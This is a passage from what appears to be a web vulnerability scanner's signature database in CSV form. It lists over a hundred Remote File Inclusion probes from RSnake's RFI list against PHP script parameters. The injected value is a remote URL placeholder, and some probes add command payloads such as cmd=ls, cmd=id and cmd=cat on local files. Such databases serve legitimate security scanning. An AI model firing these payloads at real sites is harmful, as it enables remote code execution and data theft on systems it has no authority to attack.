list.\",\"\",\"\"\n\"004774\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/search.php?repertorylevel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004775\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/forum/track.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004776\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/frame.php?framefile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004777\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/ftp.php?path_local=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004778\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/function.inc.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004779\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/function.php?adminfolder=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004780\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/function.php?gbpfad=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004781\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004782\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions.php?pmp_rel_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004783\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions.php?s[phppath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004784\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions.php?set_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004785\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions/form.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004786\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions/general.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004787\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions/groups.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004788\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions/js.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004789\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions/prepend_adm.php?SETS[path][physical]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004790\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions/prepend_adm.php?SETS[path][physical]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004791\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions/sections.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004792\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions/users.func.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004793\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/functions_mod_user.php?phpbb_root_path=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004794\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/fusebox5.php?FUSEBOX_APPLICATION_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004795\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/galerie.php?config[root_ordner]=@RFIURL?cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004797\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gallery/lib/content.php?include=@RFIURL?cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004798\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gallery/theme/include_mode/template.php?galleryfilesdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004799\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gallerypath/index.php?includepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004800\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/games.php?id=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004801\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/games.php?scoreid=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004802\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gbook/includes/header.php?abspath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004803\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gemini/page/forums/bottom.php?lang=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004804\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gen_m3u.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004805\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/genepi.php?topdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004806\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/generate.php?ht_pfad=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004807\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gepi/gestion/savebackup.php?filename=@RFIURL&cmd=cat+@LFI(abs)\",\"GET\",\"BODY:PHP Version||@LFI()\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004808\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gestArt/aide.php3?aide=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004810\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/getpage.php?page=online&doc_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004811\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/global.php?abs_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004812\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gorum/dbproperty.php?appDirName=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004813\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gpb/include/db.mysql.inc.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004814\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gpb/include/db.mysql.inc.php?root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004815\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gpb/include/gpb.inc.php?root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004816\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gpb/include/gpb.inc.php?root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004817\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/graph.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004818\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/gruppen.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004819\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/handlers/email/mod.listmail.php?_PM_[path][handle]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004820\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/handlers/page/show.php?sous_rep=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004821\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/head.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004822\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/header.inc.php?CssFile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004823\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/header.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004824\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/header.php?wwwRoot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004825\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/help.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004826\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/help/index.php?show=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004827\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004829\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/hioxBannerRotate.php?hm=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004830\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/hioxRandomAd.php?hm=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004831\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/hioxstats.php?hm=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004832\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/hioxupdate.php?hm=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004833\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/home.php?a=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004834\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/home.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004835\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/home.php?pagina=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004836\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/home/www/images/doc/index2.php?type=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004837\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/home1.php?ln=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004838\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/home2.php?ln=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004839\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/hsList.php?subdir=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004840\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/htdocs/gmapfactory/params.php?gszAppPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004841\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/html/admin/modules/plugin_admin.php?_settings[pluginpath]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004842\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/hu/modules/reg-new/modstart.php?mod_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004843\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/i_head.php?home=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004844\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/i_nav.php?home=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004845\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/iframe.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004846\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/image.php?url=@RFIURL???\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004847\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/impex/ImpExData.php?systempath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004848\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/import.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004849\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/importinfo.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004850\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/in.php?returnpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004851\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004852\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/config.inc.php?x[1]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004853\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/design.inc.php?dir[data]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004854\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/download_center_lite.inc.php?script_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004855\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/formmail.inc.php?script_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004856\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/gabarits.php?cfg_racine=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004857\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/header.inc.php?ficStyle=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004858\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/ifunctions.php?GLOBALS[phpQRootDir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004859\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/inc.php?cfg_racine=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004860\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/indexhead.php?fileloc=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004861\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/irayofuncs.php?irayodirhack=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004862\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/irayofuncs.php?irayodirhack=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004863\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/libs/Smarty_Compiler.class.php?plugin_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004864\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/libs/core/core.display_debug_console.php?plugin_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004865\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/libs/core/core.load_plugins.php?plugin_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004866\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/libs/core/core.load_resource_plugin.php?plugin_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004867\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/libs/core/core.process_cached_inserts.php?plugin_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004868\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/libs/core/core.process_compiled_include.php?plugin_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004869\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/libs/core/core.read_cache_file.php?plugin_file=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004870\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/linkbar.php?cfile=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004871\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/login.php?pathCGX=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004872\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/logingecon.php?pathCGX=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004873\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/ltdialogo.php?pathCGX=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004874\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/mtdialogo.php?pathCGX=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004875\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004876\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/prepend.inc.php?path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004877\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/service.alert.inc.php?SPL_CFG[dirroot]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004878\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/settings.php?inc_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004879\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/settings.ses.php?SPL_CFG[dirroot]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004880\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/shows.inc.php?cutepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004881\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc/sige_init.php?SYS_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004882\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_group.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004883\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_group.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004884\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_manager.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004885\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_manager.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004886\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_newgroup.php.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004887\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_newgroup.php.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004888\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_smb_conf.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004889\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_smb_conf.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004890\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_user.php?include_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004891\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/inc_user.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004892\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include.php?_APP_RELATIVE_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004893\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include.php?gorumDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004894\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include.php?myng_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004895\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include.php?path=psp/user.php&site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004896\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include.php?path[docroot]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004897\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/include.php?sunPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion 